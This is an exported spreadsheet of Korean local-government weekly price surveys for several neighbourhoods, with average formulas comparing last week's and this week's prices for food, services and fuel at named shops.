[1,"밀가루","중력분 1등품\n(1봉지 3kg)",{"$f":"COUNTIF(J86,\"<>0\")+COUNTIF(N86,\"<>0\")","v":2},{"$f":"COUNTIF(K86,\"<>0\")+COUNTIF(O86,\"<>0\")","v":2},{"$f":"IF(D86=0,0,SUM(J86,N86)/D86)","v":5700},{"$f":"IF(E86=0,0,SUM(K86,O86)/E86)","v":5700},{"$f":"G86-F86","v":0},"농협하나로마트",5700,5700,{"$f":"K86-J86","v":0},"홈플러스",5700,5700,{"$f":"O86-N86","v":0}]
[2,"두부","공장제품 1모",{"$f":"COUNTIF(J87,\"<>0\")+COUNTIF(N87,\"<>0\")","v":2},{"$f":"COUNTIF(K87,\"<>0\")+COUNTIF(O87,\"<>0\")","v":2},{"$f":"IF(D87=0,0,SUM(J87,N87)/D87)","v":1365},{"$f":"IF(E87=0,0,SUM(K87,O87)/E87)","v":1365},{"$f":"G87-F87","v":0},"농협하나로마트",1240,1240,{"$f":"K87-J87","v":0},"홈플러스",1490,1490,{"$f":"O87-N87","v":0}]
[3,"우유","흰 우유(종이팩) 1개\n200㎖",{"$f":"COUNTIF(J88,\"<>0\")+COUNTIF(N88,\"<>0\")","v":2},{"$f":"COUNTIF(K88,\"<>0\")+COUNTIF(O88,\"<>0\")","v":2},{"$f":"IF(D88=0,0,SUM(J88,N88)/D88)","v":970},{"$f":"IF(E88=0,0,SUM(K88,O88)/E88)","v":970},{"$f":"G88-F88","v":0},"농협하나로마트",990,990,{"$f":"K88-J88","v":0},"홈플러스",950,950,{"$f":"O88-N88","v":0}]
[4,"식용유","콩기름 1.8ml",{"$f":"COUNTIF(J89,\"<>0\")+COUNTIF(N89,\"<>0\")","v":2},{"$f":"COUNTIF(K89,\"<>0\")+COUNTIF(O89,\"<>0\")","v":2},{"$f":"IF(D89=0,0,SUM(J89,N89)/D89)","v":8080},{"$f":"IF(E89=0,0,SUM(K89,O89)/E89)","v":8080},{"$f":"G89-F89","v":0},"농협하나로마트",7680,7680,{"$f":"K89-J89","v":0},"홈플러스",8480,8480,{"$f":"O89-N89","v":0}]
[5,"설탕","정백당 1kg",{"$f":"COUNTIF(J90,\"<>0\")+COUNTIF(N90,\"<>0\")","v":2},{"$f":"COUNTIF(K90,\"<>0\")+COUNTIF(O90,\"<>0\")","v":2},{"$f":"IF(D90=0,0,SUM(J90,N90)/D90)","v":1980},{"$f":"IF(E90=0,0,SUM(K90,O90)/E90)","v":1980},{"$f":"G90-F90","v":0},"농협하나로마트",1980,1980,{"$f":"K90-J90","v":0},"홈플러스",1980,1980,{"$f":"O90-N90","v":0}]
[6,"생수","플라스틱 1병(500㎖)",{"$f":"COUNTIF(J91,\"<>0\")+COUNTIF(N91,\"<>0\")","v":2},{"$f":"COUNTIF(K91,\"<>0\")+COUNTIF(O91,\"<>0\")","v":2},{"$f":"IF(D91=0,0,SUM(J91,N91)/D91)","v":455},{"$f":"IF(E91=0,0,SUM(K91,O91)/E91)","v":455},{"$f":"G91-F91","v":0},"농협하나로마트",430,430,{"$f":"K91-J91","v":0},"홈플러스",480,480,{"$f":"O91-N91","v":0}]
[7,"맥주","1병 500㎖\n(병 보증금 포함)",{"$f":"COUNTIF(J92,\"<>0\")+COUNTIF(N92,\"<>0\")","v":2},{"$f":"COUNTIF(K92,\"<>0\")+COUNTIF(O92,\"<>0\")","v":2},{"$f":"IF(D92=0,0,SUM(J92,N92)/D92)","v":1695},{"$f":"IF(E92=0,0,SUM(K92,O92)/E92)","v":1695},{"$f":"G92-F92","v":0},"농협하나로마트",1580,1580,{"$f":"K92-J92","v":0},"홈플러스",1810,1810,{"$f":"O92-N92","v":0}]
[8,"소주","1병 360㎖\n(병 보증금 포함)",{"$f":"COUNTIF(J93,\"<>0\")+COUNTIF(N93,\"<>0\")","v":2},{"$f":"COUNTIF(K93,\"<>0\")+COUNTIF(O93,\"<>0\")","v":2},{"$f":"IF(D93=0,0,SUM(J93,N93)/D93)","v":1385},{"$f":"IF(E93=0,0,SUM(K93,O93)/E93)","v":1385},{"$f":"G93-F93","v":0},"농협하나로마트",1390,1390,{"$f":"K93-J93","v":0},"홈플러스",1380,1380,{"$f":"O93-N93","v":0}]
[9,"등유","주유소 판매 1ℓ",{"$f":"COUNTIF(J94,\"<>0\")+COUNTIF(N94,\"<>0\")","v":2},{"$f":"COUNTIF(K94,\"<>0\")+COUNTIF(O94,\"<>0\")","v":2},{"$f":"IF(D94=0,0,SUM(J94,N94)/D94)","v":1600},{"$f":"IF(E94=0,0,SUM(K94,O94)/E94)","v":1600},{"$f":"G94-F94","v":0},"S-oil 매일주유소",1600,1600,0,"GS희망찬주유소",1600,1600,{"$f":"O94-N94","v":0}]
[10,"경유","주유소 판매 1ℓ",{"$f":"COUNTIF(J95,\"<>0\")+COUNTIF(N95,\"<>0\")","v":2},{"$f":"COUNTIF(K95,\"<>0\")+COUNTIF(O95,\"<>0\")","v":2},{"$f":"IF(D95=0,0,SUM(J95,N95)/D95)","v":1558.5},{"$f":"IF(E95=0,0,SUM(K95,O95)/E95)","v":1558.5},{"$f":"G95-F95","v":0},"S-oil 매일주유소",1579,1579,{"$f":"K95-J95","v":0},"GS희망찬주유소",1538,1538,{"$f":"O95-N95","v":0}]
[11,"휘발유","주유소 판매 1ℓ\n(무연)",{"$f":"COUNTIF(J96,\"<>0\")+COUNTIF(N96,\"<>0\")","v":2},{"$f":"COUNTIF(K96,\"<>0\")+COUNTIF(O96,\"<>0\")","v":2},{"$f":"IF(D96=0,0,SUM(J96,N96)/D96)","v":1678.5},{"$f":"IF(E96=0,0,SUM(K96,O96)/E96)","v":1678.5},{"$f":"G96-F96","v":0},"S-oil 매일주유소",1699,1699,{"$f":"K96-J96","v":0},"GS희망찬주유소",1658,1658,{"$f":"O96-N96","v":0}]
[12,"피아노\n학원비","관인학원\n(초급반 1개월)",{"$f":"COUNTIF(J97,\"<>0\")+COUNTIF(N97,\"<>0\")","v":2},{"$f":"COUNTIF(K97,\"<>0\")+COUNTIF(O97,\"<>0\")","v":2},{"$f":"IF(D97=0,0,SUM(J97,N97)/D97)","v":150000},{"$f":"IF(E97=0,0,SUM(K97,O97)/E97)","v":150000},{"$f":"G97-F97","v":0},"클라라피아노",150000,150000,{"$f":"K97-J97","v":0},"바하의 아이들",150000,150000,{"$f":"O97-N97","v":0}]
[13,"미술학원비","초등 저학년 1개월\n(재료비 포함)",{"$f":"COUNTIF(J98,\"<>0\")+COUNTIF(N98,\"<>0\")","v":2},{"$f":"COUNTIF(K98,\"<>0\")+COUNTIF(O98,\"<>0\")","v":2},{"$f":"IF(D98=0,0,SUM(J98,N98)/D98)","v":155000},{"$f":"IF(E98=0,0,SUM(K98,O98)/E98)","v":155000},{"$f":"G98-F98","v":0},"파란미술학원",150000,150000,{"$f":"K98-J98","v":0},"꿈나무미술학원",160000,160000,{"$f":"O98-N98","v":0}]

{"sheet":"중마동2","index":4,"n_rows":98,"n_cols":16,"rows_kept":98,"merged":[[1,0,1,15],[2,0,2,6],[2,12,2,13],[3,0,4,0],[3,1,4,1],[3,2,4,2],[3,5,3,7],[3,8,3,11],[3,12,3,15],[5,0,5,2],[34,0,34,2],[84,0,84,2]]}
[]
["주  간  물  가  동  향(중마동2)"]
[{"$nulls":12},"조사자 : 조영희"]
["연번","품목","규격·단위",null,null,"평     균",null,null,"조 사 1 지 역(와이마트)",{"$nulls":3},"조 사 2 지 역(중마시장)"]
[{"$nulls":5},"전주","금주","증감액","조 사 처","전주","금주","증감액","조 사 처","전주","금주","증감액"]
["농·축·수산물(28개 품목)"]
[1,"쌀","일반미20 (kg)",{"$f":"COUNTIF(J7,\"<>0\")+COUNTIF(N7,\"<>0\")","v":2},2,{"$f":"IF(D7=0,0,SUM(J7,N7)/D7)","v":55250},55250,{"$f":"G7-F7","v":0},"와이마트",54500,54500,{"$f":"K7-J7","v":0},"중마시장",56000,56000,{"$f":"O7-N7","v":0}]
[2,"무","상품 1개(1㎏)",2,2,1500,1500,0,"와이마트",1500,1500,0,"중마시장",1500,1500,0]
[3,"상추","잎상추 500g",2,2,5450,5450,0,"와이마트",5900,5900,0,"중마시장",5000,5000,0]
[4,"양상추","상품1개(500g)",1,1,2000,2600,600,"와이마트",2000,2600,600,"중마시장",0,0,0]
[5,"애호박","상품1개(250~300g)",2,2,2000,1800,-200,"와이마트",2000,1600,-400,"중마시장",2000,2000,0]
[6,"열무","상품 4kg(1단)",1,1,10000,10000,0,"와이마트",0,0,0,"중마시장",10000,10000,0]
[7,"양파","1망 1kg",2,2,3175,3250,75,"와이마트",3350,3500,150,"중마시장",3000,3000]
[8,"오이","상품 3개",2,2,3900,4350,450,"와이마트",3300,4200,900,"중마시장",4500,4500,0]
[9,"풋고추","신선한것 1kg",2,2,10550,11050,500,"와이마트",13100,13100,0,"중마시장",8000,9000,1000]
[10,"마늘","깐것 상품 1kg",2,2,10500,10500,0,"와이마트",11000,11000,0,"중마시장",10000,10000,0]
[11,"감자","흰색 1kg",2,2,5950,5950,0,"와이마트",6900,6900,0,"중마시장",5000,5000,0]
[12,"배추","1포기 3kg",2,2,6250,5500,-750,"와이마트",6500,5500,-1000,"중마시장",6000,5500,-500]
[13,"콩나물","1봉지 500g ",2,2,1650,1650,0,"와이마트",2300,2300,0,"중마시장",1000,1000,0]
[14,"사과","상품 1개(300∼350g)",2,2,1550,1550,0,"와이마트",1600,1600,0,"중마시장",1500,1500,0]
[15,"배","상품 1개(650∼700g)",2,2,3250,3250,0,"와이마트",3000,3000,0,"중마시장",3500,3500,0]
[16,"바나나","상품 1kg",2,2,5050,4700,-350,"와이마트",5100,4400,-700,"중마시장",5000,5000,0]
[17,"쇠고기\n(한우)","등심 600g(상등육)",2,2,61500,73000,11500,"와이마트",69000,81000,12000,"롯데슈퍼",54000,65000,11000]
[18,"쇠고기\n(수입육)","등심 600g(상등육)",1,1,13500,13500,0,"와이마트",13500,13500,0,"롯데슈퍼",0,0,0]
[19,"돼지고기","삼겹살 600g(상등육)",2,2,14590,15810,1220,"와이마트",15480,16080,600,"롯데슈퍼",13700,15540,1840]
[20,"닭고기","육계 1마리(1kg 정도)",2,2,{"$f":"IF(D26=0,0,SUM(J26,N26)/D26)","v":8450},{"$f":"IF(E26=0,0,SUM(K26,O26)/E26)","v":8650},200,"와이마트",7900,8300,400,"중마시장",9000,9000,0]
[21,"달걀","특란 30개 한판",2,2,{"$f":"IF(D27=0,0,SUM(J27,N27)/D27)","v":7600},7875,275,"와이마트",7200,7750,550,"중마시장",8000,8000,0]
[22,"조기","15cm 1마리",2,2,993.5,1243.5,250,"와이마트",987,987,0,"중마시장",1000,1500,500]
[23,"갈치","60cm 1마리",2,2,15250,17750,2500,"와이마트",13500,13500,0,"중마시장",17000,22000,5000]
[24,"명태","40cm 1마리",2,2,4450,4450,0,"와이마트",4900,4900,0,"중마시장",4000,4000,0]
[25,"고등어","30cm 1마리",2,2,6400,6400,0,"와이마트",5800,5800,0,"중마시장",7000,7000,0]
[26,"냉동오징어","30cm 1마리",2,2,6800,6800,0,"와이마트",6600,6600,0,"중마시장",7000,7000,0]
[27,"콩","상품 1kg",2,2,11900,11900,0,"와이마트",14500,14500,0,"중마시장",13800,13800,0]
[28,"고춧가루","상품 3kg",2,2,81250,81250,0,"와이마트",82500,82500,0,"중마시장",80000,80000,0]
["개인서비스 요금(49개 품목)"]
[1,"설렁탕","1인분 (보통)",{"$f":"COUNTIF(J36,\"<>0\")+COUNTIF(N36,\"<>0\")","v":2},2,{"$f":"IF(D36=0,0,SUM(J36,N36)/D36)","v":10000},10000,{"$f":"G36-F36","v":0},"큰집설렁탕",10000,10000,{"$f":"K36-J36","v":0},"종가집설렁탕",10000,10000,{"$f":"O36-N36","v":0}]
[2,"냉면","물냉면, 1인분(보통)",2,2,12000,12000,0,"황초갈비냉면",13000,13000,0,"진주황포냉면",11000,11000,0]
[3,"비빔밥","1인분(보통)",2,2,7500,7500,0,"김밥천국",6000,6000,0,"학운정",9000,9000,0]
[4,"갈비탕","1인분(보통)",2,2,14000,14000,0,"백운목장",13000,13000,0,"바우네나주곰탕",15000,15000,0]
[5,"삼계탕","1인분(보통)",2,2,15500,15500,0,"지호삼계탕",17000,17000,0,"대복삼계탕",14000,14000,0]
[6,"된장찌개\n백반","1인분(보통)",2,2,8000,8000,0,"덕이네식당",8000,8000,0,"맛사랑",8000,8000,0]
[7,"김치찌개\n백반","1인분(보통)",2,2,8000,8000,0,"판문점",8000,8000,0,"맛사랑",8000,8000,0]
[8,"불고기","1인분(200g)\n공기밥 제외",2,2,23500,23500,0,"금정",24000,24000,0,"백운목장",23000,23000,0]
[9,"등심구이","1인분(200g)\n공기밥 제외",2,2,40000,40000,0,"한마음회관",40000,40000,0,"한마당생고기",40000,40000,0]
[10,"생선초밥","1인분(보통), 활어기준",2,2,17500,17500,0,"광양초밥",19000,19000,0,"대길초밥",16000,16000,0]
[11,"튀김닭","양념통닭 1마리",2,2,19000,19000,0,"멕시카나",18000,18000,0,"BHC",20000,20000,0]
[12,"칼국수","1인분(보통)",2,2,7500,7500,0,"밀밭해물칼국수",8000,8000,0,"정인정칼국수",7000,7000,0]
[13,"조리라면","분식점 1인분",2,2,4250,4250,0,"김밥나라중동무등점",4000,4000,0,"김가네",4500,4500,0]
[14,"김밥","분식점 1인분",2,2,3500,3500,0,"김밥나라중동무등점",3500,3500,0,"김가네",3500,3500,0]
[15,"짜장면","1인분(보통)",2,2,5450,5450,0,"봄차이나",5900,5900,0,"시장중화요리",5000,5000,0]
[16,"짬뽕","1인분(보통)",2,2,6450,6450,0,"봄차이나",6900,6900,null,"시장중화요리",6000,6000,0]
[17,"탕수육","일반탕수육(보통)",2,2,18000,18000,0,"봄차이나",21000,21000,0,"시장중화요리",15000,15000,0]
[18,"돈가스","일반돈가스,1인분",2,2,7950,7950,0,"돈비가",7900,7900,0,"용우동",8000,8000,0]
[19,"햄버거","기본형(야채,고기)",2,2,4900,4900,0,"뉴욕버거",3900,3900,0,"맘스터치",5900,5900,0]
[20,"피자","기본형(야채,고기)",2,2,19900,19900,0,"피자마루",20900,20900,0,"청년피자",18900,18900,0]
[21,"커피(외식)","일반원두커피",2,2,3350,3350,0,"이디아커피",3200,3200,0,"엔젤인어스",3500,3500,0]
[22,"국산차(외식)","녹차(티백 또는 잎녹차)",1,1,3200,3200,0,"이디아커피",3200,3200,0,"엔젤인어스",0,0,0]
[23,"삼겹살","식육식당 200g(국내산)",2,2,15716.5,15716.5,0,"한마당생고기",14100,14100,0,"한마음회관",17333,17333,0]
[24,"돼지갈비","식육식당 200g(국내산)",2,2,11500,11500,0,"판문점",10000,10000,0,"한마음회관",13000,13000,0]
[25,"쇠갈비","식육식당 200g(국내산)",0,0,0,0,0,null,0,0,0,null,0,0,0]
[26,"생맥주","500CC 1잔",2,2,3750,3750,0,"투다리",4000,4000,0,"까투리",3500,3500,0]
[27,"공동\n주택관리비","주공 18평1개월\n(공과금 제외)",2,2,62400,62400,0,"주공2차아파트",52000,52000,0,"선우아파트",72800,72800,0]
[28,"양 복\n세탁료","신사복 상·하\n드라이크리닝 1회",2,2,9000,9000,0,"모아모아빨래방",5000,5000,0,"드라이하우스",13000,13000,0]
[29,"의복수선료","신사복 바지\n밑단줄임 1회",2,2,4500,4500,0,"모아모아빨래방",4000,4000,0,"드라이하우스",5000,5000,0]
[30,"영화관람요\n(방화. 외화)","상영시간 100분정도 1회\n(입장세,문예진흥기금포함)",0,0,0,0,0,null,0,0,0,null,0,0,0]
[31,"경기장\n입장료","공공체육시설\n(성인 1인)",0,0,0,0,0,null,0,0,0,null,0,0,0]
[32,"수영장\n이용료","일반성인 1회\n(체육기금 포함)",0,0,0,0,0,"커뮤니티센터",0,0,0,null,0,0,0]
[33,"볼링장\n이용료","일반성인\n평일오후 1게임",2,2,4000,4000,0,"가야볼링장",4000,4000,0,null,4000,4000,0]
[34,"골프연습장\n이용료","초급(남자회원)1개월\n(레슨비 미포함)",2,2,225000,225000,0,"제이골프아카데미",250000,250000,0,"체인지골프아카데미",200000,200000,0]
[35,"노래방\n이용료","일반인 저녁 1시간",2,2,20000,20000,0,"솔로몬노래연습장",20000,20000,0,"좋아좋아노래연습장",20000,20000,0]
[36,"당구장\n이용료","큐선대 일반인 저녁\n1시간",2,2,10000,10000,0,"진당구클럽",10000,10000,0,"발섬당구장",10000,10000,0]
[37,"사진촬영료","칼라 반명함 1조\n(상급사진관 3x4)",2,2,19000,19000,0,"명진포토샵",18000,18000,0,"코코포토",20000,20000,0]
[38,"사진인화료","디지털사진인화요금,\n현상료 포함",2,2,400,400,0,"명진포토샵",300,300,0,"코코포토",500,500,0]
[39,"영상매체대여료","최신판 영화 DVD대여요금",0,0,0,0,0,null,0,0,0,null,0,0,0]
[40,"이용료(컷트)","성인조발 중류급 1회",2,2,14000,14000,0,"커트맨",10000,10000,0,"중앙이용원",18000,18000,0]
[41,"미용료","성인여자 파마(일반)",2,2,32500,32500,0,"한가을헤어샵",35000,35000,0,"아이리스헤어",30000,30000,0]
[42,"목욕료\n(성인)","대중탕(성인 1회)\n(1회용품 제외)",1,1,8000,8000,0,"백운사우나",8000,8000,0,null,0,0,0]
[43,"숙박료\n(호텔)","평일, 스탠다드,부가세 및 봉사료 포함",0,0,0,0,0,null,0,0,0,null,0,0,0]
[44,"숙박료\n(여관)","독방, 1박, 욕탕부설",2,2,40000,40000,0,"리베라모텔",40000,40000,0,"유토피아모텔",40000,40000,0]
[45,"콘도미니엄\n이용료","25평정도 회원기준\n1실 1일 사용",0,0,0,0,0,null,0,0,0,null,0,0,0]
[46,"PC방\n이용료","1회 이용시",2,2,1000,1000,0,"PC토랑",1000,1000,0,"3POP피시방",1000,1000,0]
[47,"택배이용료","20kg이하, 타지역",2,2,6100,6100,0,"경동택배",6000,6000,0,"한진택배",6200,6200,0]
[48,"찜질방\n이용료","찜질방(성인 1회)\n(1회용품 제외)",2,2,0,0,0,{"$nulls":3},0,{"$nulls":3},0]
[49,"대입학원비(종합)","대입(4년제)재수생 종합반 수강료",2,2,0,0,0,{"$nulls":3},0,{"$nulls":3},0]
["공산품 등 기타(13개품목)"]
[1,"밀가루","중력분 1등품\n(1봉지 3kg)",{"$f":"COUNTIF(J86,\"<>0\")+COUNTIF(N86,\"<>0\")","v":2},2,{"$f":"IF(D86=0,0,SUM(J86,N86)/D86)","v":6800},6800,{"$f":"G86-F86","v":0},"와이마트",6250,6250,{"$f":"K86-J86","v":0},"롯데슈퍼",7350,7350,{"$f":"O86-N86","v":0}]
[2,"두부","공장제품 1모",2,2,1425,1425,0,"와이마트",1400,1400,0,"롯데슈퍼",1450,1450,0]
[3,"우유","흰 우유(종이팩) 1개\n200㎖",2,2,1050,1050,0,"와이마트",1100,1100,0,"롯데슈퍼",1000,1000,0]
[4,"식용유","콩기름 1.8ml",2,2,10265,10265,0,"와이마트",8550,8550,0,"롯데슈퍼",11980,11980,0]
[5,"설탕","정백당 1kg",2,2,2410,2410,0,"와이마트",2500,2500,0,"롯데슈퍼",2320,2320,0]
[6,"생수","플라스틱 1병(500㎖)",2,2,540,540,0,"와이마트",550,550,0,"롯데슈퍼",530,530,0]
[7,"맥주","1병 500㎖\n(병 보증금 포함)",2,2,{"$f":"IF(D92=0,0,SUM(J92,N92)/D92)","v":1820},1820,0,"와이마트",1680,1680,0,"롯데슈퍼",1960,1960,0]
[8,"소주","1병 360㎖\n(병 보증금 포함)",2,2,{"$f":"IF(D93=0,0,SUM(J93,N93)/D93)","v":1525},{"$f":"IF(E93=0,0,SUM(K93,O93)/E93)","v":1525},0,"와이마트",1490,1490,0,"롯데슈퍼",1560,1560,0]
[9,"등유","주유소 판매 1ℓ",0,0,0,0,0,"SK고향주유소",0,0,0,"GS태양점",0,0,0]
[10,"경유","주유소 판매 1ℓ",2,2,{"$f":"IF(D95=0,0,SUM(J95,N95)/D95)","v":1553},1553,0,"SK고향주유소",1568,1568,0,"GS태양점",1538,1538,0]
[11,"휘발유","주유소 판매 1ℓ\n(무연)",2,2,{"$f":"IF(D96=0,0,SUM(J96,N96)/D96)","v":1658},1658,0,"SK고향주유소",1658,1658,0,"GS태양점",1658,1658,0]
[12,"피아노\n학원비","관인학원\n(초급반 1개월)",2,2,{"$f":"IF(D97=0,0,SUM(J97,N97)/D97)","v":150000},150000,0,"피앤플음악학원",150000,150000,0,"음사랑음악학원",150000,150000,0]
[13,"미술학원비","초등 저학년 1개월\n(재료비 포함)",2,2,{"$f":"IF(D98=0,0,SUM(J98,N98)/D98)","v":150000},150000,0,"하늘담은미술",140000,140000,0,"예초미술학원",160000,160000,0]

{"sheet":"광영동","index":5,"n_rows":98,"n_cols":16,"rows_kept":98,"merged":[[1,0,1,15],[2,0,2,6],[2,12,2,13],[3,0,4,0],[3,1,4,1],[3,2,4,2],[3,5,3,7],[3,8,3,11],[3,12,3,15],[5,0,5,2],[34,0,34,2],[84,0,84,2]]}
[]
["주  간  물  가  동  향(광영동) 조사자:진옥윤"]
[{"$nulls":12},"조사자 : 진옥윤"]
["연번","품목","규격·단위",null,null,"평     균",null,null,"조 사 1 지 역 (광영농협)",{"$nulls":3},"조 사 2 지 역 (광영시장)"]
[{"$nulls":5},"전주","금주","증감액","조 사 처","전주","금주","증감액","조 사 처","전주","금주","증감액"]
["농·축·수산물(26개 품목)"]
[1,"쌀","일반미 20kg(웰빙간척)",2,{"$f":"COUNTIF(K7,\"<>0\")+COUNTIF(O7,\"<>0\")","v":2},{"$f":"IF(D7=0,0,SUM(J7,N7)/D7)","v":{"v":51800,"d":"51,800"}},{"v":55900,"d":"55,900"},{"$f":"G7-F7","v":{"v":4100,"d":"4,100"}},"광영농협",{"v":53800,"d":"53,800"},{"v":53800,"d":"53,800"},{"$f":"K7-J7","v":0},"지마트(햅쌀)",{"v":49800,"d":"49,800"},{"v":58000,"d":"58,000"},{"$f":"O7-N7","v":{"v":8200,"d":"8,200"}}]
[2,"무","상품 1개(1㎏)",{"$f":"COUNTIF(J8,\"<>0\")+COUNTIF(N8,\"<>0\")","v":2},2,{"$f":"IF(D8=0,0,SUM(J8,N8)/D8)","v":{"v":1300,"d":"1,300"}},{"$f":"IF(E8=0,0,SUM(K8,O8)/E8)","v":{"v":1300,"d":"1,300"}},0,"광영농협",{"v":1600,"d":"1,600"},{"v":1600,"d":"1,600"},0,"광영시장",{"v":1000,"d":"1,000"},{"v":1000,"d":"1,000"},0]
[3,"상추","잎상추 500g",2,2,{"$f":"IF(D9=0,0,SUM(J9,N9)/D9)","v":{"v":3750,"d":"3,750"}},3725,-25,"광영농협",{"v":4500,"d":"4,500"},{"v":4450,"d":"4,450"},-50,"광영시장",{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0]
[4,"양상추","상품1개(350~400g)",2,2,{"v":2150,"d":"2,150"},{"v":2400,"d":"2,400"},250,"광영농협",{"v":2300,"d":"2,300"},{"v":2800,"d":"2,800"},500,"광영시장",{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},0]
[5,"애호박","상품1개(300~350g)",2,2,{"v":1440,"d":"1,440"},{"v":1440,"d":"1,440"},0,"광영농협",{"v":1380,"d":"1,380"},{"v":1380,"d":"1,380"},0,"광영시장",{"v":1500,"d":"1,500"},{"v":1500,"d":"1,500"},0]
[6,"열무","상품 4kg(1단)",2,{"$f":"COUNTIF(K12,\"<>0\")+COUNTIF(O12,\"<>0\")","v":2},{"v":9000,"d":"9,000"},{"v":7500,"d":"7,500"},{"v":-1500,"d":"-1,500"},"광영농협",{"v":10000,"d":"10,000"},{"v":8000,"d":"8,000"},{"v":-2000,"d":"-2,000"},"광영시장",{"v":8000,"d":"8,000"},{"v":7000,"d":"7,000"},{"v":-1000,"d":"-1,000"}]
[7,"양파","1망 1kg",{"$f":"COUNTIF(J13,\"<>0\")+COUNTIF(N13,\"<>0\")","v":2},2,{"v":2150,"d":"2,150"},{"v":2250,"d":"2,250"},100,"광영농협",{"v":2300,"d":"2,300"},{"v":2500,"d":"2,500"},200,"광영시장",{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},0]
[8,"오이","상품 3개",2,{"$f":"COUNTIF(K14,\"<>0\")+COUNTIF(O14,\"<>0\")","v":2},{"v":3750,"d":"3,750"},{"v":3450,"d":"3,450"},-300,"광영농협",{"v":4500,"d":"4,500"},{"v":3900,"d":"3,900"},-600,"광영시장",{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0]
[9,"풋고추","신선한것 1kg",2,2,{"v":8900,"d":"8,900"},{"v":7950,"d":"7,950"},-950,"광영농협",{"v":9800,"d":"9,800"},{"v":7900,"d":"7,900"},{"v":-1900,"d":"-1,900"},"광영시장",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0]
[10,"마늘","깐것 상품 1kg",2,2,{"v":9450,"d":"9,450"},{"v":9250,"d":"9,250"},-200,"광영농협",{"v":8900,"d":"8,900"},{"v":8500,"d":"8,500"},-400,"광영시장",{"v":10000,"d":"10,000"},{"v":10000,"d":"10,000"},0]
[11,"감자","흰색 1kg",2,2,{"v":5450,"d":"5,450"},{"v":5450,"d":"5,450"},0,"광영농협",{"v":6900,"d":"6,900"},{"v":6900,"d":"6,900"},0,"광영시장",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0]
[12,"배추","1포기 3kg",2,2,{"v":4250,"d":"4,250"},{"v":4250,"d":"4,250"},0,"광영농협",{"v":4500,"d":"4,500"},{"v":4500,"d":"4,500"},0,"광영시장",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0]
[13,"콩나물","1봉지 500g ",2,2,{"v":1650,"d":"1,650"},{"v":1650,"d":"1,650"},0,"광영농협",{"v":2300,"d":"2,300"},{"v":2300,"d":"2,300"},0,"광영시장",{"v":1000,"d":"1,000"},{"v":1000,"d":"1,000"},0]
[14,"사과","상품 1개(300∼350g)",2,2,{"v":3950,"d":"3,950"},{"v":3850,"d":"3,850"},-100,"광영농협",{"v":3900,"d":"3,900"},{"v":3700,"d":"3,700"},-200,"광영시장",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0]
[15,"배","(600-700)",2,2,{"v":3750,"d":"3,750"},{"v":3750,"d":"3,750"},0,"광영농협",{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},0,"광영시장",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0]
[16,"바나나","상품 1kg",2,2,{"v":3675,"d":"3,675"},{"v":3650,"d":"3,650"},-25,"광영농협",{"v":3350,"d":"3,350"},{"v":3300,"d":"3,300"},-50,"광영시장",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0]
[17,"쇠고기\n(한우)","등심 600g(상등육)",2,2,{"v":52500,"d":"52,500"},{"v":47400,"d":"47,400"},{"v":-5100,"d":"-5,100"},"광영농협",{"v":51000,"d":"51,000"},{"v":40800,"d":"40,800"},{"v":-10200,"d":"-10,200"},"광영시장",{"v":54000,"d":"54,000"},{"v":54000,"d":"54,000"},0]
[18,"쇠고기\n(수입육)","등심 600g(상등육)",1,1,{"v":30000,"d":"30,000"},{"v":30000,"d":"30,000"},0,"광영농협",null,null,0,"광영시장",{"v":30000,"d":"30,000"},{"v":30000,"d":"30,000"},0]
[19,"돼지고기","삼겹살 600g(상등육)",{"$f":"COUNTIF(J25,\"<>0\")+COUNTIF(N25,\"<>0\")","v":2},2,{"v":14340,"d":"14,340"},{"v":13140,"d":"13,140"},{"v":-1200,"d":"-1,200"},"광영농협",{"v":13680,"d":"13,680"},{"v":11280,"d":"11,280"},{"v":-2400,"d":"-2,400"},"광영시장",{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},0]
[20,"닭고기","육계 1마리(1kg 정도)",2,2,{"v":8450,"d":"8,450"},{"v":8450,"d":"8,450"},0,"광영농협",{"v":8900,"d":"8,900"},{"v":8900,"d":"8,900"},0,"광영시장",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0]
[21,"달걀","특란 30개 한판",2,2,{"v":7300,"d":"7,300"},{"v":7300,"d":"7,300"},0,"광영농협",{"v":7600,"d":"7,600"},{"v":7600,"d":"7,600"},0,"광영시장",{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0]
[22,"조기","15cm 1마리",2,2,{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0,"광영농협",{"v":2500,"d":"2,500"},{"v":2500,"d":"2,500"},0,"광영시장",{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},0]
[23,"갈치","60cm 1마리",{"$f":"COUNTIF(J29,\"<>0\")+COUNTIF(N29,\"<>0\")","v":2},2,{"v":5950,"d":"5,950"},{"v":5475,"d":"5,475"},-475,"광영농협",{"v":4900,"d":"4,900"},{"v":4950,"d":"4,950"},50,"광영시장",{"v":7000,"d":"7,000"},{"v":6000,"d":"6,000"},{"v":-1000,"d":"-1,000"}]
[24,"명태","40cm 1마리",2,2,{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},0,"광영농협",{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},0,"광영시장",{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},0]
[25,"고등어","30cm 1마리",2,2,{"v":4150,"d":"4,150"},{"v":3650,"d":"3,650"},-500,"광영농협",{"v":4800,"d":"4,800"},{"v":3800,"d":"3,800"},{"v":-1000,"d":"-1,000"},"광영시장",{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},0]
[26,"냉동오징어","30cm 1마리",2,2,{"v":5700,"d":"5,700"},{"v":4725,"d":"4,725"},-975,"광영농협",{"v":6400,"d":"6,400"},{"v":4450,"d":"4,450"},{"v":-1950,"d":"-1,950"},"광영시장",{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},0]
